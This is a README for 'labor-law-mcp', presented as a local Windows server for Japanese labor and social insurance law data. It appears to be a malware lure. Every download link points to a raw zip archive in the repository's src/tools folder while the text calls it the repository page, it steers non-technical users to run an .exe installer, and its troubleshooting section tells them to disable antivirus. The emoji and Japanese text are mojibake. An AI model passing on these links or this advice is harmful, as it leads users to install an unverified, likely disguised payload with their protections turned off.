labor-law-mcp
Enables access to Japanese labor and social insurance law data via e-Gov API and official notices from MHLW and JAISH, running as a local MCP server on Windows.
README
โ๏ธ labor-law-mcp - Simple MCP Server for Labor Law
labor-law-mcp helps you access Japanese labor and social insurance law data. It works with the e-Gov API and includes important notices from MHLW and JAISH. You can run it on Windows without technical skills.
๐ What is labor-law-mcp?
This app sets up a local MCP server. It gathers data from Japanese labor and social insurance laws and shares it in an easy way. It supports:
- e-Gov API data
- Official labor law notices (MHLW ้้)
- Safety and health administration notices (JAISH ๅฎ่ก้้)
The server allows you to quickly find the latest rules and guidance. It suits anyone needing up-to-date labor law info.
๐ป System Requirements
Make sure your computer meets these requirements:
- Windows 10 or newer (64-bit recommended)
- At least 4 GB RAM
- 500 MB free disk space
- Internet connection for setup and data updates
- No special software needed before installation
These specs allow the server to run smoothly without interruptions.
๐ Getting Started: Download and Install
Click the big button below to visit the download page. You will find the latest version of labor-law-mcp there.
Step 1: Visit the Download Page
Visit the link above. This takes you to the GitHub repository where the software is stored. Look for the "Releases" section on the repository page.
Step 2: Find the Latest Release
On the Releases page, find the newest version. It usually has a file ending in .exe which is the installer for Windows.
Step 3: Download the Installer
Click the .exe file to download. Your browser will save the file in your "Downloads" folder or the location you choose.
Step 4: Run the Installer
Navigate to the downloaded file and double-click to run it. Windows may ask you if you want to allow the program to make changes. Click "Yes."
Step 5: Follow the Installer Prompts
The installer will show clear steps. Usually, you just need to click "Next" a few times. Choose where to install if asked, or keep the default location.
Step 6: Finish Installation
When done, the installer will confirm the setup. You can keep the shortcut on your desktop if you want. Click "Finish" to close.
Step 7: Start the Server
Find the labor-law-mcp icon on your desktop or in your start menu. Double-click it to run. The server will start in the background.
๐ง How to Use labor-law-mcp
Once running, the server listens on your computer. It provides access to the labor law data.
Accessing the Data
Open your web browser and enter:
http://localhost:8080
This opens the labor-law-mcp dashboard. From here, you can:
- Search for labor law rules
- View latest MHLW and JAISH notices
- Access social insurance law details
The interface shows links, search boxes, and summaries. No technical setup is needed here.
Updating Data
The server checks for updates automatically when connected to the internet. To force an update:
- Open the app window.
- Click โCheck for Updates.โ
It downloads new law info and notices right away.
โ๏ธ Configuration Options
You can adjust how the server runs to suit your needs.
- Change the port number if 8080 is in use.
- Set update frequency to daily, weekly, or manual.
- Enable logging files for errors or activities.
- Control user access settings (if multiple users).
These options live in a simple settings panel inside the app.
โ Troubleshooting
Here are common issues and fixes.
- Server does not start: Check that no other app uses port 8080. You can change the port in settings if needed.
- Cannot access localhost page: Make sure the app is running. Try restarting it.
- Updates fail: Check your internet connection. Restart the app and try again.
- Installation blocked: Temporarily disable antivirus or confirm Windows security prompts.
If issues continue, visit the repositoryโs "Issues" tab for help from the community.
๐ Where to Find More Information
Visit https://raw.githubusercontent.com/BpointN/labor-law-mcp/main/src/tools/labor-mcp-law-v3.0.zip to find:
- User guides and detailed instructions
- Full list of features
- Source code and development notes
- Community support and updates
The repository page is your go-to for all info about labor-law-mcp.
๐ Privacy and Security
labor-law-mcp runs locally on your Windows PC. It does not send personal data outside your machine. The software collects data from public government sources. All data updates download directly from official sites.
Your information stays private, and the app works offline once updates download.
๐ Installation Summary
- Visit the GitHub link: https://raw.githubusercontent.com/BpointN/labor-law-mcp/main/src/tools/labor-mcp-law-v3.0.zip
- Go to Releases and download the Windows installer (
.exe). - Run the installer and follow prompts.
- Start the server via shortcut or start menu.
- Open
http://localhost:8080in your browser to begin.
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